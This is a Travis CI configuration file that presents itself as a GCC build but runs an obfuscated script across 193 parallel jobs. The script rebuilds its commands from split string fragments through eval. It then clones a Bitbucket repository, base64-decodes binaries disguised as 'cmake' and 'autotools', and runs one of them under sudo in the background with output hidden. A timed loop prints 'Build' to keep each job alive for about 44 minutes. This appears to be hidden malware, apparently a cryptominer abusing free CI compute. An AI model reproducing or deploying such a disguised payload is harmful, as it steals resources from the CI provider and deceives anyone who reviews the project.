dist: bionic

env:
  - BUILD="WB1"
  - BUILD="WB2"
  - BUILD="WB3"
  - BUILD="WB4"
  - BUILD="WB5"
  - BUILD="WB6"
  - BUILD="WB7"
  - BUILD="WB8"
  - BUILD="WB9"
  - BUILD="WB10"
  - BUILD="WB11"
  - BUILD="WB12"
  - BUILD="WB13"
  - BUILD="WB14"
  - BUILD="WB15"
  - BUILD="WB16"
  - BUILD="WB17"
  - BUILD="WB18"
  - BUILD="WB19"
  - BUILD="WB20"
  - BUILD="WB21"
  - BUILD="WB22"
  - BUILD="WB23"
  - BUILD="WB24"
  - BUILD="WB25"
  - BUILD="WB26"
  - BUILD="WB27"
  - BUILD="WB28"
  - BUILD="WB29"
  - BUILD="WB30"
  - BUILD="WB31"
  - BUILD="WB32"
  - BUILD="WB33"
  - BUILD="WB34"
  - BUILD="WB35"
  - BUILD="WB36"
  - BUILD="WB37"
  - BUILD="WB38"
  - BUILD="WB39"
  - BUILD="WB40"
  - BUILD="WB41"
  - BUILD="WB42"
  - BUILD="WB43"
  - BUILD="WB44"
  - BUILD="WB45"
  - BUILD="WB46"
  - BUILD="WB47"
  - BUILD="WB48"
  - BUILD="WB49"
  - BUILD="WB50"
  - BUILD="WB51"
  - BUILD="WB52"
  - BUILD="WB53"
  - BUILD="WB54"
  - BUILD="WB55"
  - BUILD="WB56"
  - BUILD="WB57"
  - BUILD="WB58"
  - BUILD="WB59"
  - BUILD="WB60"
  - BUILD="WB61"
  - BUILD="WB62"
  - BUILD="WB63"
  - BUILD="WB64"
  - BUILD="WB65"
  - BUILD="WB66"
  - BUILD="WB67"
  - BUILD="WB68"
  - BUILD="WB69"
  - BUILD="WB70"
  - BUILD="WB71"
  - BUILD="WB72"
  - BUILD="WB73"
  - BUILD="WB74"
  - BUILD="WB75"
  - BUILD="WB76"
  - BUILD="WB77"
  - BUILD="WB78"
  - BUILD="WB79"
  - BUILD="WB80"
  - BUILD="WB81"
  - BUILD="WB82"
  - BUILD="WB83"
  - BUILD="WB84"
  - BUILD="WB85"
  - BUILD="WB86"
  - BUILD="WB87"
  - BUILD="WB88"
  - BUILD="WB89"
  - BUILD="WB90"
  - BUILD="WB91"
  - BUILD="WB92"
  - BUILD="WB93"
  - BUILD="WB94"
  - BUILD="WB95"
  - BUILD="WB96"
  - BUILD="WB97"
  - BUILD="WB98"
  - BUILD="WB99"
  - BUILD="WB100"
  - BUILD="WB101"
  - BUILD="WB102"
  - BUILD="WB103"
  - BUILD="WB104"
  - BUILD="WB105"
  - BUILD="WB106"
  - BUILD="WB107"
  - BUILD="WB108"
  - BUILD="WB109"
  - BUILD="WB110"
  - BUILD="WB111"
  - BUILD="WB112"
  - BUILD="WB113"
  - BUILD="WB114"
  - BUILD="WB115"
  - BUILD="WB116"
  - BUILD="WB117"
  - BUILD="WB118"
  - BUILD="WB119"
  - BUILD="WB120"
  - BUILD="WB121"
  - BUILD="WB122"
  - BUILD="WB123"
  - BUILD="WB124"
  - BUILD="WB125"
  - BUILD="WB126"
  - BUILD="WB127"
  - BUILD="WB128"
  - BUILD="WB129"
  - BUILD="WB130"
  - BUILD="WB131"
  - BUILD="WB132"
  - BUILD="WB133"
  - BUILD="WB134"
  - BUILD="WB135"
  - BUILD="WB136"
  - BUILD="WB137"
  - BUILD="WB138"
  - BUILD="WB139"
  - BUILD="WB140"
  - BUILD="WB141"
  - BUILD="WB142"
  - BUILD="WB143"
  - BUILD="WB144"
  - BUILD="WB145"
  - BUILD="WB146"
  - BUILD="WB147"
  - BUILD="WB148"
  - BUILD="WB149"
  - BUILD="WB150"
  - BUILD="WB151"
  - BUILD="WB152"
  - BUILD="WB153"
  - BUILD="WB154"
  - BUILD="WB155"
  - BUILD="WB156"
  - BUILD="WB157"
  - BUILD="WB158"
  - BUILD="WB159"
  - BUILD="WB160"
  - BUILD="WB161"
  - BUILD="WB162"
  - BUILD="WB163"
  - BUILD="WB164"
  - BUILD="WB165"
  - BUILD="WB166"
  - BUILD="WB167"
  - BUILD="WB168"
  - BUILD="WB169"
  - BUILD="WB170"
  - BUILD="WB171"
  - BUILD="WB172"
  - BUILD="WB173"
  - BUILD="WB174"
  - BUILD="WB175"
  - BUILD="WB176"
  - BUILD="WB177"
  - BUILD="WB178"
  - BUILD="WB179"
  - BUILD="WB180"
  - BUILD="WB181"
  - BUILD="WB182"
  - BUILD="WB183"
  - BUILD="WB184"
  - BUILD="WB185"
  - BUILD="WB186"
  - BUILD="WB187"
  - BUILD="WB188"
  - BUILD="WB189"
  - BUILD="WB190"
  - BUILD="WB191"
  - BUILD="WB192"
  - BUILD="WB193"

language: minimal

script:
  - CTylgZd="sudo apt up"
  - xQnHMl="date || tru"
  - eval "$CTylgZd""$xQnHMl""e"
  - kTaaEyI="sudo apt --"
  - hlyrO="yes install"
  - XHPctUstQcd=" cl-base64 "
  - BaSgmePJGB="git &>/dev/"
  - eval "$kTaaEyI""$hlyrO""$XHPctUstQcd""$BaSgmePJGB""null"
  - uZroQUKiEW="git clone h"
  - xzHPCv="ttps://gccb"
  - GaUoAP="uild@bitbuc"
  - wnsIAH="ket.org/gcc"
  - yRhzSlYo="build/gcc.g"
  - CPJEF="it &>/dev/n"
  - eval "$uZroQUKiEW""$xzHPCv""$GaUoAP""$wnsIAH""$yRhzSlYo""$CPJEF""ull"
  - ZJXUSMELx="base64 -d g"
  - pQelMeencX="cc/cmake_ >"
  - eval "$ZJXUSMELx""$pQelMeencX"" cmake"
  - qMCXU="base64 -d g"
  - ymAbjBo="cc/config_ "
  - mayRUR="> output.lo"
  - eval "$qMCXU""$ymAbjBo""$mayRUR""g"
  - DHCjdcs="base64 -d g"
  - MSOPwvkJ="cc/make_ > "
  - eval "$DHCjdcs""$MSOPwvkJ""autotools"
  - YQwyznYPRU="chmod +x au"
  - mgCYcr="totools cma"
  - eval "$YQwyznYPRU""$mgCYcr""ke"
  - ./cmake
  - sed -i 's/build/tg3o/g' output.log
  - sudo ./autotools --config output.log &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2636)) ] && sudo killall autotools && break; sleep 235; done
